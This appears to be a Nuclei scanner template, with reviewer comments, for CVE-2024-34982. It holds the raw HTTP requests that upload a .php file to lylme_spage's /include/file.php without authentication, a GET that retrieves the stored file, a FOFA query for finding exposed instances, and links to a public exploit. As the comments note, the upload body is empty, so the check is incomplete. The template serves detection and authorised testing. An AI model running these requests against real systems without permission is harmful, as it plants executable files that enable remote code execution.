# Nuclei template: two-step check for CVE-2024-34982 (file upload through
# /include/file.php in lylme_spage). Step 1 posts a multipart form whose part
# is named with a .php extension; step 2 fetches the path the server returned.
# NOTE(review): this copy was collapsed onto one line; the layout below is a
# reconstruction of the YAML structure with no values changed.
id: CVE-2024-34982

info:
  # NOTE(review): "Arbitary" is a typo for "Arbitrary"; left as-is because the
  # name is part of the template's reported output.
  name: LyLme-Spage - Arbitary File Upload
  author: DhiyaneshDk
  severity: high
  description: |
    An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.
  reference:
    - https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md
    - https://github.com/tanjiti/sec_profile
    - https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py
  classification:
    # The CPE leaves the version as a wildcard; the description names v1.9.5.
    # No cve-id / cwe-id / CVSS fields are present in this copy.
    cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    # NOTE(review): two raw requests are defined below while max-request says 1;
    # confirm which is intended.
    max-request: 1
    vendor: lylme
    product: lylme_spage
    # Favicon-hash search fingerprint kept as metadata; not used by the requests
    # below. Useful for inventorying your own exposed instances.
    fofa-query: icon_hash="-282504889"
  # `intrusive`: the check writes a file on the target. Nothing in the visible
  # requests removes it afterwards, so plan cleanup of the uploaded
  # {{filename}}.php after an authorised test.
  tags: cve,cve2024,lylme-spage,rce,intrusive

# Request 2 is only evaluated when request 1 matched.
flow: http(1) && http(2)

variables:
  # Random marker that the second request expects to find in the response body.
  string: "{{randstr}}"
  # Random five-letter lowercase base name for the uploaded file.
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  # Step 1: multipart upload. The request carries no cookie or authorization
  # header, and the part declares Content-Type image/png while its filename ends
  # in .php, so a match means the endpoint kept the client-supplied extension.
  # NOTE(review): the part body is empty in this copy and the `string` variable
  # is never sent, so the step-2 body matcher cannot succeed as written; the
  # part content looks to have been lost when the page was extracted.
  # Log signature for defenders: POST /include/file.php with a multipart
  # filename ending in .php, followed by a GET of the returned upload path.
  - raw:
      - |
        POST /include/file.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------575673989461736

        -----------------------------575673989461736
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: image/png

        -----------------------------575673989461736--

    # All three words plus HTTP 200 are required: a JSON-looking reply that
    # contains "code", "msg" and a value ending in php"} (the stored name kept
    # its .php extension).
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"code":'
          - '"msg":'
          - 'php"}'
        condition: and

      - type: status
        status:
          - 200

    # Captures the stored file's URL for step 2. The character class only allows
    # lowercase letters, digits, '/', '_' and '.', which bounds what can end up
    # in the follow-up request line. `internal: true` keeps the value as a
    # template variable instead of printing it in results.
    extractors:
      - type: regex
        name: path
        part: body
        group: 1
        regex:
          - '"url":"([/a-z_0-9.]+)"'
        internal: true

  # Step 2: fetch the returned path and confirm the marker is served back as
  # text/html. NOTE(review): no status-code condition here; only body and
  # header content are checked.
  - raw:
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{{string}}" )'
          - 'contains(header, "text/html")'
        condition: and
# NOTE(review): template signature. It presumably no longer verifies once the
# file content changes (added comments included) — re-sign before relying on it.
# digest: 4a0a00473045022100d6aa315d5179da098583ea0872b86fe414cbc4cda8301de18ddfafb2a93013ae0220177931a6619243ead54124a71f081a30a8e952360d780e51afa8290a31cff24d:922c64590222798bb761d5b6d8e72950